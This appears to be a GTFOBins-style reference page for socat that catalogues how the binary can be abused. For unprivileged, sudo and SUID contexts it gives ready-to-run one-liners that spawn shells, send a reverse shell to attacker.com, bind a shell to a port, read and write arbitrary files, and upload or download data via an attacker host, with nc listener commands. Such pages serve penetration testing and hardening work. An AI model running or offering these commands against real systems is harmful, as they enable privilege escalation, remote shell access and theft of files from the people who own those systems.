.. / socat

Fork Star

• Shell
• Reverse shell
• Bind shell
• File write
• File read
• Upload
• Download

Shell

This executable can spawn an interactive system shell.

• Unprivileged

  This function can be performed by any unprivileged user.

  socat - exec:/bin/sh,pty,ctty,raw,echo=0

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  socat - exec:/bin/sh,pty,ctty,raw,echo=0

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  Remarks

  This executable runs commands directly, e.g., via functions like exec, remember to omit the -p argument of every /bin/sh invocation for distributions where the default shell does not drop SUID privileges.

  socat - 'exec:/bin/sh -p,pty,ctty,raw,echo=0'

Reverse shell

This executable can send back a reverse system shell to a listening attacker.

• Unprivileged

  This function can be performed by any unprivileged user.

  socat tcp-connect:attacker.com:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  socat tcp-connect:attacker.com:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  Remarks

  This executable runs commands directly, e.g., via functions like exec, remember to omit the -p argument of every /bin/sh invocation for distributions where the default shell does not drop SUID privileges.

  socat tcp-connect:attacker.com:12345 'exec:/bin/sh -p,pty,stderr,setsid,sigint,sane'

  TTY

  The spawned shell is just a dummy REPL that can only run simple terminal commands.

  Listener

  A TCP server can be used on the attacker box to receive the shell.

  socat file:/dev/tty,raw,echo=0 tcp-listen:12345

Bind shell

This executable can bind a system shell to a local port waiting for an attacker to connect.

• Unprivileged

  This function can be performed by any unprivileged user.

  socat tcp-listen:12345,reuseaddr,fork exec:/bin/sh,pty,stderr,setsid,sigint,sane

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  socat tcp-listen:12345,reuseaddr,fork exec:/bin/sh,pty,stderr,setsid,sigint,sane

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  Remarks

  This executable runs commands directly, e.g., via functions like exec, remember to omit the -p argument of every /bin/sh invocation for distributions where the default shell does not drop SUID privileges.

  socat tcp-listen:12345,reuseaddr,fork 'exec:/bin/sh -p,pty,stderr,setsid,sigint,sane'

  TTY

  The spawned shell is just a dummy REPL that can only run simple terminal commands.

  Connector

  A TCP client can be used on the attacker box to receive the shell.

  socat file:/dev/tty,raw,echo=0 tcp:victim.com:12345

File write

This executable can write data to local files.

• Comment

  The echo command is actually used.

  Unprivileged

  This function can be performed by any unprivileged user.

  socat -u 'exec:echo DATA' open:/path/to/output-file,creat

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  socat -u 'exec:echo DATA' open:/path/to/output-file,creat

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  socat -u 'exec:echo DATA' open:/path/to/output-file,creat

File read

This executable can read data from local files.

• Unprivileged

  This function can be performed by any unprivileged user.

  socat -u file:/path/to/input-file -

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  socat -u file:/path/to/input-file -

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  socat -u file:/path/to/input-file -

Upload

This executable can upload local data.

• Unprivileged

  This function can be performed by any unprivileged user.

  socat -u file:/path/to/input-file tcp-connect:attacker.com:12345

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  socat -u file:/path/to/input-file tcp-connect:attacker.com:12345

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  socat -u file:/path/to/input-file tcp-connect:attacker.com:12345

  Receiver

  A TCP server can be used on the attacker box to receive the data.

  nc -l -p 12345 >/path/to/output-file

Download

This executable can download remote data.

• Unprivileged

  This function can be performed by any unprivileged user.

  socat -u tcp-connect:attacker.com:12345 open:/path/to/output-file,creat

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  socat -u tcp-connect:attacker.com:12345 open:/path/to/output-file,creat

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  socat -u tcp-connect:attacker.com:12345 open:/path/to/output-file,creat

  Sender

  A TCP server can be used on the attacker box to send the data.

  nc -l -p 12345 </path/to/input-file

Source | History